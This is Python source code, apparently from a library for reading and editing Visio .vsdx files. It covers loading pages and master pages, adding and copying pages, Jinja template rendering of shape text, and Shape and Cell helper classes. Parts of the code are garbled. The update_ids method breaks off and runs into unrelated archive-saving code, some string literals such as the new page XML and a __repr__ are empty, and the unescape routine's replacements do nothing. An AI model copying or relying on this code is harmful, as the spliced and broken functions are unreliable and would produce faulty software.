@staticmethod def pretty_print_element(xml: Element) -> str: if type(xml) is Element: return minidom.parseString(ET.tostring(xml)).toprettyxml() else: return f"Not an Element. type={type(xml)}" def open_vsdx_file(self): with zipfile.ZipFile(self.filename, "r") as zip_ref: zip_ref.extractall(self.directory) # load each page file into an ElementTree object self.load_pages() self.load_master_pages() def _pages_filename(self): page_dir = f'{self.directory}/visio/pages/' pages_filename = page_dir + 'pages.xml' # pages.xml contains Page name, width, height, mapped to Id return pages_filename def load_pages(self): rel_dir = f'{self.directory}/visio/pages/_rels/' page_dir = f'{self.directory}/visio/pages/' rel_filename = rel_dir + 'pages.xml.rels' rels = file_to_xml(rel_filename).getroot() # rels contains page filenames self.pages_xml_rels = file_to_xml(rel_filename) # store pages.xml.rels so pages can be added or removed if self.debug: print(f"Relationships({rel_filename})", VisioFile.pretty_print_element(rels)) relid_page_dict = {} for rel in rels: rel_id = rel.attrib['Id'] page_file = rel.attrib['Target'] relid_page_dict[rel_id] = page_file pages_filename = self._pages_filename() # pages contains Page name, width, height, mapped to Id pages = file_to_xml(pages_filename).getroot() # this contains a list of pages with rel_id and filename self.pages_xml = file_to_xml(pages_filename) # store xml so pages can be removed if self.debug: print(f"Pages({pages_filename})", VisioFile.pretty_print_element(pages)) for page in pages: # type: Element rel_id = page[1].attrib['{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id'] page_name = page.attrib['Name'] page_path = page_dir + relid_page_dict.get(rel_id, None) new_page = VisioFile.Page(file_to_xml(page_path), page_path, page_name, self) self.pages.append(new_page) if self.debug: print(f"Page({new_page.filename})", VisioFile.pretty_print_element(new_page.xml.getroot())) self.content_types_xml = file_to_xml(f'{self.directory}/[Content_Types].xml') # TODO: add correctness cross-check. Or maybe the other way round, start from [Content_Types].xml # to get page_dir and other paths... self.app_xml = file_to_xml(f'{self.directory}/docProps/app.xml') def load_master_pages(self): # get data from /visio/masters folder master_rel_path = f'{self.directory}/visio/masters/_rels/masters.xml.rels' master_rels_data = file_to_xml(master_rel_path) master_rels = master_rels_data.getroot() if master_rels_data else [] if self.debug: print(f"Master Relationships({master_rel_path})", VisioFile.pretty_print_element(master_rels)) # populate relid to master path relid_to_path = {} for rel in master_rels: master_id = rel.attrib.get('Id') master_path = f"{self.directory}/visio/masters/{rel.attrib.get('Target')}" # get path from rel relid_to_path[master_id] = master_path # load masters.xml file masters_path = f'{self.directory}/visio/masters/masters.xml' masters_data = file_to_xml(masters_path) # contains more info about master page (i.e. Name, Icon) masters = masters_data.getroot() if masters_data else [] # for each master page, create the VisioFile.Page object r_namespace = '{http://schemas.openxmlformats.org/officeDocument/2006/relationships}' for master in masters: rel_id = master.find(f"{namespace}Rel").attrib[f"{r_namespace}id"] master_id = master.attrib['ID'] master_path = relid_to_path[rel_id] master_page = VisioFile.Page(file_to_xml(master_path), master_path, master_id, self) self.master_pages.append(master_page) if self.debug: print(f"Master({master_path}, id={master_id})", VisioFile.pretty_print_element(master_page.xml.getroot())) return def get_page(self, n: int) -> VisioFile.Page: try: return self.pages[n] except IndexError: return None def get_page_names(self): return [p.name for p in self.pages] def get_page_by_name(self, name: str): """Get page from VisioFile with matching name :param name: The name of the required page :type name: str :return: :class:`Page` object representing the page (or None if not found) """ for p in self.pages: if p.name == name: return p def get_master_page_by_id(self, id: str): """Get master page from VisioFile with matching ID. Referred by :attr:`Shape.master_ID`. :param id: The ID of the required master :type id: str :return: :class:`Page` object representing the master page (or None if not found) """ for m in self.master_pages: if m.name == id: return m def remove_page_by_index(self, index: int): """Remove zero-based nth page from VisioFile object :param index: Zero-based index of the page :type index: int :return: None """ # remove Page element from pages.xml file - zero based index # todo: similar function by page id, and by page title page = self.pages_xml.find(f"{namespace}Page[{index+1}]") if page: self.pages_xml.getroot().remove(page) page = self.pages[index] # type: VisioFile.Page self._remove_page_from_app_xml(page.name) del self.pages[index] def _update_pages_xml_rels(self, new_page_filename: str) -> str: '''Updates the pages.xml.rels file with a reference to the new page and returns the new relid ''' max_relid = max(self.pages_xml_rels.getroot(), key=lambda rel: int(rel.attrib['Id'][3:]), default=None) # 'rIdXX' -> XX max_relid = int(max_relid.attrib['Id'][3:]) if max_relid is not None else 0 new_page_relid = f'rId{max_relid + 1}' # Most likely will be equal to len(self.pages)+1 new_page_rel = { 'Target': new_page_filename, 'Type' : 'http://schemas.microsoft.com/visio/2010/relationships/page', 'Id' : new_page_relid } self.pages_xml_rels.getroot().append(Element('{http://schemas.openxmlformats.org/package/2006/relationships}Relationship', new_page_rel)) return new_page_relid def _get_new_page_name(self, new_page_name: str) -> str: i = 1 while new_page_name in self.get_page_names(): new_page_name = f'{new_page_name}-{i}' # Page-X-i i += 1 return new_page_name def _get_max_page_id(self) -> int: page_with_max_id = max(self.pages_xml.getroot(), key=lambda page: int(page.attrib['ID'])) max_page_id = int(page_with_max_id.attrib['ID']) return max_page_id def _get_index(self, *, index: int, page: VisioFile.Page or None): if type(index) is PagePosition: # only update index if it is relative to source page if index == PagePosition.LAST: index = len(self.pages) elif index == PagePosition.FIRST: index = 0 elif page: # need page for BEFORE or AFTER orig_page_idx = self.pages.index(page) if index == PagePosition.BEFORE: # insert new page at the original page's index index = orig_page_idx elif index == PagePosition.AFTER: # insert new page after the original page index = orig_page_idx + 1 else: index = len(self.pages) # default to LAST if invalid Position/page combination return index def _update_content_types_xml(self, new_page_filename: str): content_types = self.content_types_xml.getroot() content_types_attribs = { 'PartName' : f'/visio/pages/{new_page_filename}', 'ContentType': 'application/vnd.ms-visio.page+xml' } cont_types_namespace = '{http://schemas.openxmlformats.org/package/2006/content-types}' content_types_element = Element(f'{cont_types_namespace}Override', content_types_attribs) # add the new element after the last such element # first find the index: all_page_overrides = content_types.findall( f'{cont_types_namespace}Override[@ContentType="application/vnd.ms-visio.page+xml"]' ) idx = list(content_types).index(all_page_overrides[-1]) # then add it: content_types.insert(idx+1, content_types_element) def _add_page_to_app_xml(self, new_page_name: str): HeadingPairs = self.app_xml.getroot().find(f'{ext_prop_namespace}HeadingPairs') i4 = HeadingPairs.find(f'.//{vt_namespace}i4') num_pages = int(i4.text) i4.text = str(num_pages+1) # increment as page added TitlesOfParts = self.app_xml.getroot().find(f'{ext_prop_namespace}TitlesOfParts') vector = TitlesOfParts.find(f'{vt_namespace}vector') lpstr = Element(f'{vt_namespace}lpstr') lpstr.text = new_page_name vector.append(lpstr) # add new lpstr element with new page name vector_size = int(vector.attrib['size']) vector.set('size', str(vector_size+1)) # increment as page added def _remove_page_from_app_xml(self, page_name: str): HeadingPairs = self.app_xml.getroot().find(f'{ext_prop_namespace}HeadingPairs') i4 = HeadingPairs.find(f'.//{vt_namespace}i4') num_pages = int(i4.text) i4.text = str(num_pages-1) # decrement as page removed TitlesOfParts = self.app_xml.getroot().find(f'{ext_prop_namespace}TitlesOfParts') vector = TitlesOfParts.find(f'{vt_namespace}vector') for lpstr in vector.findall(f'{vt_namespace}lpstr'): if lpstr.text == page_name: vector.remove(lpstr) # remove page from list of names break vector_size = int(vector.attrib['size']) vector.set('size', str(vector_size-1)) # decrement as page removed def _create_page( self, *, new_page_xml_str: str, page_name: str, new_page_element: Element, index: int or PagePosition, source_page: Optional[VisioFile.Page] = None, ) -> VisioFile.Page: # Create visio\pages\pageX.xml file # Add to visio\pages\_rels\pages.xml.rels # Add to visio\pages\pages.xml # Add to [Content_Types].xml # Add to docProps\app.xml page_dir = f'{self.directory}/visio/pages/' # TODO: better concatenation # create pageX.xml new_page_xml = ET.ElementTree(ET.fromstring(new_page_xml_str)) new_page_filename = f'page{len(self.pages) + 1}.xml' new_page_path = page_dir+new_page_filename # TODO: better concatenation # update pages.xml.rels - add rel for the new page # done by the caller # update pages.xml - insert the PageElement Element in it's correct location index = self._get_index(index=index, page=source_page) self.pages_xml.getroot().insert(index, new_page_element) # update [Content_Types].xml - insert reference to the new page self._update_content_types_xml(new_page_filename) # update app.xml, if it exists if self.app_xml: self._add_page_to_app_xml(page_name) # Update VisioFile object new_page = VisioFile.Page(new_page_xml, new_page_path, page_name, self) self.pages.insert(index, new_page) # insert new page at defined index return new_page def add_page_at(self, index: int, name: Optional[str] = None) -> VisioFile.Page: """Add a new page at the specified index of the VisioFile :param index: zero-based index where the new page will be placed :type index: int :param name: The name of the new page :type name: str, optional :return: :class:`Page` object representing the new page """ # Determine the new page's name new_page_name = self._get_new_page_name(name or f'Page-{len(self.pages) + 1}') # Determine the new page's filename new_page_filename = f'page{len(self.pages) + 1}.xml' # Add reference to the new page in pages.xml.rels and get new relid new_page_relid = self._update_pages_xml_rels(new_page_filename) # Create default empty page xml # TODO: figure out the best way to define this default pagesheet XML # For example, python-docx has a 'template.docx' file which is copied. new_pagesheet_attribs = { 'FillStyle': '0', 'LineStyle': '0', 'TextStyle': '0' } new_pagesheet_element = Element(f'{namespace}PageSheet', new_pagesheet_attribs) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'PageWidth', 'V':'8.26771653543307'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'PageHeight', 'V':'11.69291338582677'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'ShdwOffsetX', 'V':'0.1181102362204724'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'ShdwOffsetY', 'V':'-0.1181102362204724'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'PageScale', 'U':'MM', 'V':'0.03937007874015748'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'DrawingScale', 'U':'MM', 'V':'0.03937007874015748'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'DrawingSizeType', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'DrawingScaleType', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'InhibitSnap', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'PageLockReplace', 'U':'BOOL', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'PageLockDuplicate', 'U':'BOOL', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'UIVisibility', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'ShdwType', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'ShdwObliqueAngle', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'ShdwScaleFactor', 'V':'1'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'DrawingResizeType', 'V':'1'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'PageShapeSplit', 'V':'1'})) new_page_attribs = { 'ID' : str(self._get_max_page_id() + 1), 'NameU': new_page_name, 'Name' : new_page_name, } new_page_element = Element(f'{namespace}Page', new_page_attribs) new_page_element.append(new_pagesheet_element) new_page_rel = { '{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id' : new_page_relid } new_page_element.append(Element(f'{namespace}Rel', new_page_rel)) # create the new page new_page = self._create_page( new_page_xml_str = f"", page_name = new_page_name, new_page_element = new_page_element, index = index ) return new_page def add_page(self, name: Optional[str] = None) -> VisioFile.Page: """Add a new page at the end of the VisioFile :param name: The name of the new page :type name: str, optional :return: Page object representing the new page """ return self.add_page_at(PagePosition.LAST, name) def copy_page(self, page: VisioFile.Page, *, index: Optional[int] = PagePosition.AFTER, name: Optional[str] = None) -> VisioFile.Page: """Copy an existing page and insert in VisioFile :param page: the :class Page: to copy :type page: VisioFile.Page :param index: the specific int or relation PagePosition location for new page :type index: int or PagePosition :param name: name of new page (note this may be altered if name already exists) :type name: str :return: the newly created page """ # Determine the new page's name new_page_name = self._get_new_page_name(name or page.name) # Determine the new page's filename new_page_filename = f'page{len(self.pages) + 1}.xml' # Add reference to the new page in pages.xml.rels and get new relid new_page_relid = self._update_pages_xml_rels(new_page_filename) # Copy the source page and update relevant attributes page_element = self.pages_xml.find(f"{namespace}Page[@Name='{page.name}']") new_page_element = ET.fromstring(ET.tostring(page_element)) new_page_element.attrib['ID'] = str(self._get_max_page_id() + 1) new_page_element.attrib['NameU'] = new_page_name new_page_element.attrib['Name'] = new_page_name new_page_element.find(f'{namespace}Rel').attrib['{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id'] = new_page_relid # create the new page new_page = self._create_page( new_page_xml_str = ET.tostring(page.xml.getroot()), page_name = new_page_name, new_page_element = new_page_element, index = index, source_page = page, ) # copy pageX.xml.rels if it exists # from testing, this does not actually seem to make a difference _, original_filename = os.path.split(page.filename) page_xml_rels_file = f'{self.directory}/visio/pages/_rels/{original_filename}.rels' # TODO: better concatenation new_page_xml_rels_file = f'{self.directory}/visio/pages/_rels/{new_page_filename}.rels' # TODO: better concatenation try: shutil.copy(page_xml_rels_file, new_page_xml_rels_file) except FileNotFoundError: pass return new_page # TODO: dead code - never used def get_sub_shapes(self, shape: Element, nth=1): for e in shape: if 'Shapes' in e.tag: nth -= 1 if not nth: return e @staticmethod def get_shape_location(shape: Element) -> (float, float): x, y = 0.0, 0.0 cell_PinX = shape.find(f'{namespace}Cell[@N="PinX"]') # type: Element cell_PinY = shape.find(f'{namespace}Cell[@N="PinY"]') x = float(cell_PinX.attrib['V']) y = float(cell_PinY.attrib['V']) return x, y @staticmethod def set_shape_location(shape: Element, x: float, y: float): cell_PinX = shape.find(f'{namespace}Cell[@N="PinX"]') # type: Element cell_PinY = shape.find(f'{namespace}Cell[@N="PinY"]') cell_PinX.attrib['V'] = str(x) cell_PinY.attrib['V'] = str(y) @staticmethod # TODO: is this never used? def get_shape_text(shape: ET) -> str: # technically the below is not an exact replacement of the above... text = "" text_elem = shape.find(f"{namespace}Text") if text_elem is not None: text = "".join(text_elem.itertext()) return text @staticmethod # TODO: is this never used? def set_shape_text(shape: ET, text: str): t = shape.find(f"{namespace}Text") # type: Element if t is not None: if t.text: t.text = text else: t[0].tail = text # context = {'customer_name':'co.', 'year':2020 } # example shape text "For {{customer_name}} (c){{year}}" -> "For codypy.com (c)2020" @staticmethod def apply_text_context(shapes: Element, context: dict): def _replace_shape_text(shape: Element, context: dict): text = VisioFile.get_shape_text(shape) for key in context.keys(): r_key = "{{" + key + "}}" text = text.replace(r_key, str(context[key])) VisioFile.set_shape_text(shape, text) for shape in shapes.findall(f"{namespace}Shapes"): VisioFile.apply_text_context(shape, context) # recursive call _replace_shape_text(shape, context) for shape in shapes.findall(f"{namespace}Shape"): _replace_shape_text(shape, context) def jinja_render_vsdx(self, context: dict): """Transform a template VisioFile object using the Jinja language The method updates the VisioFile object loaded from the template file, so does not return any value Note: vsdx specific extensions are available such as `{% for item in list %}` statements with no `{% endfor %}` :param context: A dictionary containing values that can be accessed by the Jinja processor :type context: dict :return: None """ # parse each shape in each page as Jinja2 template with context pages_to_remove = [] # list of pages to be removed after loop for page in self.pages: # type: VisioFile.Page # check if page should be removed if VisioFile.jinja_page_showif(page, context): loop_shape_ids = list() for shapes_by_id in page.shapes: # type: VisioFile.Shape VisioFile.jinja_render_shape(shape=shapes_by_id, context=context, loop_shape_ids=loop_shape_ids) source = ET.tostring(page.xml.getroot(), encoding='unicode') source = VisioFile.unescape_jinja_statements(source) # unescape chars like < and > inside {%...%} template = Template(source) output = template.render(context) page.xml = ET.ElementTree(ET.fromstring(output)) # create ElementTree from Element created from output # update loop shape IDs page.set_max_ids() for shape_id in loop_shape_ids: shapes_by_id = page.find_shapes_by_id(shape_id) # type: List[VisioFile.Shape] if shapes_by_id and len(shapes_by_id) > 1: delta = 0 for shape in shapes_by_id[1:]: # from the 2nd onwards - leaving original unchanged # increment each new shape duplicated by the jinja loop self.increment_sub_shape_ids(shape, page) delta += shape.height # automatically move each duplicate down shape.move(0, -delta) # move duplicated shapes so they are visible else: # note page to remove after this loop has completed pages_to_remove.append(page) # remove pages after processing for p in pages_to_remove: self.remove_page_by_index(p.index_num) @staticmethod def jinja_render_shape(shape: VisioFile.Shape, context: dict, loop_shape_ids: list): prev_shape = None for s in shape.sub_shapes(): # type: VisioFile.Shape # manage for loops in template loop_shape_id = VisioFile.jinja_create_for_loop_if(s, prev_shape) if loop_shape_id: loop_shape_ids.append(loop_shape_id) prev_shape = s # manage 'set self' statements VisioFile.jinja_set_selfs(s, context) VisioFile.jinja_render_shape(shape=s, context=context, loop_shape_ids=loop_shape_ids) @staticmethod def jinja_set_selfs(shape: VisioFile.Shape, context: dict): # apply any {% self self.xxx = yyy %} statements in shape properties jinja_source = shape.text matches = re.findall('{% set self.(.*?)\s?=\s?(.*?) %}', jinja_source) # non-greedy search for all {%...%} strings for m in matches: # type: tuple # expect ('property', 'value') such as ('x', '10') or ('y', 'n*2') property_name = m[0] value = "{{ "+m[1]+" }}" # Jinja to be processed # todo: replace any self references in value with actual value - i.e. {% set self.x = self.x+1 %} self_refs = re.findall('self.(.*)[\s+-/*//]?', m[1]) # greedy search for all self.? between +, -, *, or / for self_ref in self_refs: # type: tuple # expect ('property', 'value') such as ('x', '10') or ('y', 'n*2') ref_val = str(shape.__getattribute__(self_ref[0])) value = value.replace('self.'+self_ref[0], ref_val) # use Jinja template to calculate any self refs found template = Template(value) # value might be '{{ 1.0+2.4*3 }}' value = template.render(context) if property_name in ['x', 'y']: shape.__setattr__(property_name, value) # remove any {% set self %} statements, leaving any remaining text matches = re.findall('{% set self.*?%}', jinja_source) for m in matches: jinja_source = jinja_source.replace(m, '') # remove Jinja 'set self' statement shape.text = jinja_source @staticmethod def unescape_jinja_statements(jinja_source): # unescape any text between {% ... %} jinja_source_out = jinja_source matches = re.findall('{%(.*?)%}', jinja_source) # non-greedy search for all {%...%} strings for m in matches: unescaped = m.replace('>', '>').replace('<', '<') jinja_source_out = jinja_source_out.replace(m, unescaped) return jinja_source_out @staticmethod def jinja_create_for_loop_if(shape: VisioFile.Shape, previous_shape:VisioFile.Shape or None): # update a Shapes tag where text looks like a jinja {% for xxxx %} loop # move text to start of Shapes tag and add {% endfor %} at end of tag text = shape.text # use regex to find all loops jinja_loops = re.findall("{% for\s(.*?)\s%}", text) for loop in jinja_loops: jinja_loop_text = f"{{% for {loop} %}}" # move the for loop to start of shapes element (just before first Shape element) if previous_shape: if previous_shape.xml.tail: previous_shape.xml.tail += jinja_loop_text else: previous_shape.xml.tail = jinja_loop_text # add jinja loop text after previous shape, before this element else: if shape.parent.xml.text: shape.parent.xml.text += jinja_loop_text else: shape.parent.xml.text = jinja_loop_text # add jinja loop at start of parent, just before this element shape.text = shape.text.replace(jinja_loop_text, '') # remove jinja loop from tag in element # add closing 'endfor' to just inside the shapes element, after last shape if shape.xml.tail: # extend or set text at end of Shape element shape.xml.tail += "{% endfor %}" else: shape.xml.tail = '{% endfor %}' jinja_show_ifs = re.findall("{% showif\s(.*?)\s%}", text) # find all showif statements # jinja_show_if - translate non-standard {% showif statement %} to valid jinja if statement for show_if in jinja_show_ifs: jinja_show_if = f"{{% if {show_if} %}}" # translate to actual jinja if statement # move the for loop to start of shapes element (just before first Shape element) if previous_shape: previous_shape.xml.tail = str(previous_shape.xml.tail or '')+jinja_show_if # add jinja loop text after previous shape, before this element else: shape.parent.xml.text = str(shape.parent.xml.text or '')+jinja_show_if # add jinja loop at start of parent, just before this element # remove original jinja showif from tag in element shape.text = shape.text.replace(f"{{% showif {show_if} %}}", '') # add closing 'endfor' to just inside the shapes element, after last shape if shape.xml.tail: # extend or set text at end of Shape element shape.xml.tail += "{% endif %}" else: shape.xml.tail = '{% endif %}' if jinja_loops: return shape.ID # return shape ID if it is a loop, so that duplicate shape IDs can be updated @staticmethod def jinja_page_showif(page: VisioFile.Page, context: dict): text = page.name jinja_source = re.findall("{% showif\s(.*?)\s%}", text) if len(jinja_source): # process last matching value template_source = "{{ "+jinja_source[-1]+" }}" template = Template(template_source) # value might be '{{ 1.0+2.4*3 }}' value = template.render(context) # is the value truthy - i.e. not 0, False, or empty string, tuple, list or dict print(f"jinja_page_showif(context={context}) statement: {template_source} returns: {type(value)} {value}") if value in ['False', '0', '', '()', '[]', '{}']: print("value in ['False', '0', '', '()', '[]', '{}']") return False # page should be hidden # remove jinja statement from page name jinja_statement = re.match("{%.*?%}", page.name)[0] page.set_name(page.name.replace(jinja_statement, '')) print(f"jinja_statement={jinja_statement} page.name={page.name}") return True # page should be left in @staticmethod def get_shape_id(shape: ET) -> str: return shape.attrib['ID'] def increment_sub_shape_ids(self, shape: VisioFile.Shape, page, id_map: dict = None): id_map = self.increment_shape_ids(shape.xml, page, id_map) self.update_ids(shape.xml, id_map) for s in shape.sub_shapes(): id_map = self.increment_shape_ids(s.xml, page, id_map) self.update_ids(s.xml, id_map) if s.sub_shapes(): id_map = self.increment_sub_shape_ids(s, page, id_map) return id_map def copy_shape(self, shape: Element, page: ET, page_path: str) -> ET: """Insert shape into first Shapes tag in destination page, and return the copy. If destination page does not have a Shapes tag yet, create it. Parameters: shape (Element): The source shape to be copied. Use Shape.xml page (ElementTree): The page where the new Shape will be placed. Use Page.xml page_path (str): The filename of the page where the new Shape will be placed. Use Page.filename Returns: ElementTree: The new shape ElementTree """ new_shape = ET.fromstring(ET.tostring(shape)) for page_obj in self.pages: if page_obj.filename == page_path: break page_obj.set_max_ids() # find or create Shapes tag shapes_tag = page.find(f"{namespace}Shapes") if shapes_tag is None: shapes_tag = Element(f"{namespace}Shapes") page.getroot().append(shapes_tag) id_map = self.increment_shape_ids(new_shape, page_obj) self.update_ids(new_shape, id_map) shapes_tag.append(new_shape) return new_shape def insert_shape(self, shape: Element, shapes: Element, page: ET, page_path: str) -> ET: # insert shape into shapes tag, and return updated shapes tag for page_obj in self.pages: if page_obj.filename == page_path: break id_map = self.increment_shape_ids(shape, page_obj) self.update_ids(shape, id_map) shapes.append(shape) return shapes def increment_shape_ids(self, shape: Element, page: VisioFile.Page, id_map: dict=None): if id_map is None: id_map = dict() self.set_new_id(shape, page, id_map) for e in shape.findall(f"{namespace}Shapes"): self.increment_shape_ids(e, page, id_map) for e in shape.findall(f"{namespace}Shape"): self.set_new_id(e, page, id_map) return id_map def set_new_id(self, element: Element, page: VisioFile.Page, id_map: dict): page.max_id += 1 max_id = page.max_id if element.attrib.get('ID'): current_id = element.attrib['ID'] id_map[current_id] = max_id # record mappings element.attrib['ID'] = str(max_id) return max_id # return new id for info def update_ids(self, shape: Element, id_map: dict): # update: 0: directory = new_filename[0:new_filename.rfind(os.sep)] if directory: if not os.path.exists(directory): os.mkdir(directory) shutil.make_archive(base_filename, 'zip', self.directory) if not new_filename: shutil.move(base_filename + '.zip', base_filename + '_new.vsdx') else: if new_filename[-5:] != '.vsdx': new_filename += '.vsdx' shutil.move(base_filename + '.zip', new_filename) self.close_vsdx() class Cell: def __init__(self, xml: Element, shape: VisioFile.Shape): self.xml = xml self.shape = shape @property def value(self): return self.xml.attrib.get('V') @value.setter def value(self, value: str): self.xml.attrib['V'] = str(value) @property def name(self): return self.xml.attrib.get('N') @property def func(self): # assume F stands for function, i.e. F="Width*0.5" return self.xml.attrib.get('F') def __repr__(self): return f"Cell: name={self.name} val={self.value} func={self.func}" class ShapeProperty: def __init__(self, name: str, value, shape: VisioFile.Shape): self.name = name self.value = value self.shape = shape class Shape: """Represents a single shape, or a group shape containing other shapes """ def __init__(self, xml: Element, parent: VisioFile.Page or VisioFile.Shape, page: VisioFile.Page): self.xml = xml self.parent = parent self.tag = xml.tag self.ID = xml.attrib.get('ID', None) self.master_shape_ID = xml.attrib.get('MasterShape', None) self.master_page_ID = xml.attrib.get('Master', None) if self.master_page_ID is None and isinstance(parent, VisioFile.Shape): # in case of a sub_shape self.master_page_ID = parent.master_page_ID self.shape_type = xml.attrib.get('Type', None) self.page = page # get Cells in Shape self.cells = dict() for e in self.xml.findall(f"{namespace}Cell"): cell = VisioFile.Cell(xml=e, shape=self) self.cells[cell.name] = cell def __repr__(self): return f"" def copy(self, page: Optional[VisioFile.Page] = None) -> VisioFile.Shape: """Copy this Shape to the specified destination Page, and return the copy. If the destination page is not specified, the Shape is copied to its containing Page. :param page: The page where the new Shape will be placed. If not specified, the copy will be placed in the original shape's page. :type page: :class:`Page` (Optional) :return: :class:`Shape` the new copy of shape """ dst_page = page or self.page new_shape_xml = self.page.vis.copy_shape(self.xml, dst_page.xml, dst_page.filename) # set parent: location for new shape tag to be added if page: # set parent to first page Shapes tag if destination page passed parent = page.shapes else: # or set parent to source shapes own parent parent = self.parent return VisioFile.Shape(xml=new_shape_xml, parent=parent, page=dst_page) @property def master_shape(self) -> VisioFile.Shape: """Get this shapes master Returns this Shape's master as a Shape object (or None) """ master_page = self.page.vis.get_master_page_by_id(self.master_page_ID) if not master_page: return # None if no master page set for this Shape master_shape = master_page.shapes[0].sub_shapes()[0] # there's always a single master shape in a master page if self.master_shape_ID is not None: master_sub_shape = master_shape.find_shape_by_id(self.master_shape_ID) return master_sub_shape return master_shape @property def data_properties(self) -> List[VisioFile.ShapeProperty]: properties = list() properties_xml = self.xml.find(f'{namespace}Section[@N="Property"]') property_rows = properties_xml.findall(f'{namespace}Row') for prop in property_rows: name = prop.attrib.get('N') value_cell = prop.find(f'{namespace}Cell[@N="Value"]') value = value_cell.attrib.get('V') if value_cell else None properties.append(VisioFile.ShapeProperty(name=name, value=value, shape=self)) return properties def cell_value(self, name: str): cell = self.cells.get(name) if cell: return cell.value if self.master_page_ID is not None: return self.master_shape.cell_value(name) def set_cell_value(self, name: str, value: str): cell = self.cells.get(name) if cell: # only set value of existing item cell.value = value elif self.master_page_ID is not None: master_cell_xml = self.master_shape.xml.find(f'{namespace}Cell[@N="{name}"]') new_cell = ET.fromstring(ET.tostring(master_cell_xml)) self.cells[name] = VisioFile.Cell(xml=new_cell, shape=self) self.cells[name].value = value self.xml.append(self.cells[name].xml) @property def line_weight(self) -> float: val = self.cell_value('LineWeight') return to_float(val) @line_weight.setter def line_weight(self, value: float or str): self.set_cell_value('LineWeight', str(value)) @property def line_color(self) -> str: return self.cell_value('LineColor') @line_color.setter def line_color(self, value: str): self.set_cell_value('LineColor', str(value)) @property def x(self): return to_float(self.cell_value('PinX')) @x.setter def x(self, value: float or str): self.set_cell_value('PinX', str(value)) @property def y(self): return to_float(self.cell_value('PinY')) @y.setter def y(self, value: float or str): self.set_cell_value('PinY', str(value)) @property def begin_x(self): return to_float(self.cell_value('BeginX')) @begin_x.setter def begin_x(self, value: float or str): self.set_cell_value('BeginX', str(value)) @property def begin_y(self): return to_float(self.cell_value('BeginY')) @begin_y.setter def begin_y(self, value: float or str): self.set_cell_value('BeginY', str(value)) @property def end_x(self): return to_float(self.cell_value('EndX')) @end_x.setter def end_x(self, value: float or str): self.set_cell_value('EndX', str(value)) @property def end_y(self): return to_float(self.cell_value('EndY')) @end_y.setter def end_y(self, value: float or str): self.set_cell_value('EndY', str(value)) def move(self, x_delta: float, y_delta: float): self.x = self.x + x_delta self.y = self.y + y_delta @property def height(self): return to_float(self.cell_value('Height')) @height.setter def height(self, value: float or str): self.set_cell_value('Height', str(value)) @property def width(self): return to_float(self.cell_value('Width')) @width.setter def width(self, value: float or str): self.set_cell_value('Width', str(value)) @staticmethod def clear_all_text_from_xml(x: Element): x.text = '' x.tail = '' for i in x: VisioFile.Shape.clear_all_text_from_xml(i) @property def text(self): # return contents of Text element, or Master shape (if referenced), or empty string text_element = self.xml.find(f"{namespace}Text") if isinstance(text_element, Element): return "".join(text_element.itertext()) # get all text from sub elements elif self.master_page_ID: return self.master_shape.text # get text from master shape return "" @text.setter def text(self, value): text_element = self.xml.find(f"{namespace}Text") if isinstance(text_element, Element): # if there is a Text element then clear out and set contents VisioFile.Shape.clear_all_text_from_xml(text_element) text_element.text = value # todo: create new Text element if not found def sub_shapes(self): shapes = list() # for each shapes tag, look for Shape objects # self can be either a Shapes or a Shape # a Shapes has a list of Shape # a Shape can have 0 or 1 Shapes (1 if type is Group) if self.shape_type == 'Group': parent_element = self.xml.find(f"{namespace}Shapes") else: # a Shapes parent_element = self.xml if parent_element: shapes = [VisioFile.Shape(xml=shape, parent=self, page=self.page) for shape in parent_element] else: shapes = [] return shapes def get_max_id(self): max_id = int(self.ID) if self.shape_type == 'Group': for shape in self.sub_shapes(): new_max = shape.get_max_id() if new_max > max_id: max_id = new_max return max_id def find_shape_by_id(self, shape_id: str) -> VisioFile.Shape: # returns Shape # recursively search for shapes by text and return first match for shape in self.sub_shapes(): # type: VisioFile.Shape if shape.ID == shape_id: return shape if shape.shape_type == 'Group': found = shape.find_shape_by_id(shape_id) if found: return found def find_shapes_by_id(self, shape_id: str) -> List[VisioFile.Shape]: # recursively search for shapes by ID and return all matches found = list() for shape in self.sub_shapes(): # type: VisioFile.Shape if shape.ID == shape_id: found.append(shape) if shape.shape_type == 'Group': sub_found = shape.find_shapes_by_id(shape_id) if sub_found: found.extend(sub_found) return found # return list of matching shapes def find_shapes_by_master(self, master_page_ID: str, master_shape_ID: str) -> List[VisioFile.Shape]: # recursively search for shapes by master ID and return all matches found = list() for shape in self.sub_shapes(): # type: VisioFile.Shape if shape.master_shape_ID == master_shape_ID and shape.master_page_ID == master_page_ID: found.append(shape) if shape.shape_type == 'Group': sub_found = shape.find_shapes_by_master(master_shape_ID, master_shape_ID) if sub_found: found.extend(sub_found) return found # return list of matching shapes def find_shape_by_text(self, text: str) -> VisioFile.Shape: # returns Shape # recursively search for shapes by text and return first match for shape in self.sub_shapes(): # type: VisioFile.Shape if text in shape.text: return shape if shape.shape_type == 'Group': found = shape.find_shape_by_text(text) if found: return found def find_shapes_by_text(self, text: str, shapes: List[VisioFile.Shape] = None) -> List[VisioFile.Shape]: # recursively search for shapes by text and return all matches if not shapes: shapes = list() for shape in self.sub_shapes(): # type: VisioFile.Shape if text in shape.text: shapes.append(shape) if shape.shape_type == 'Group': found = shape.find_shapes_by_text(text) if found: 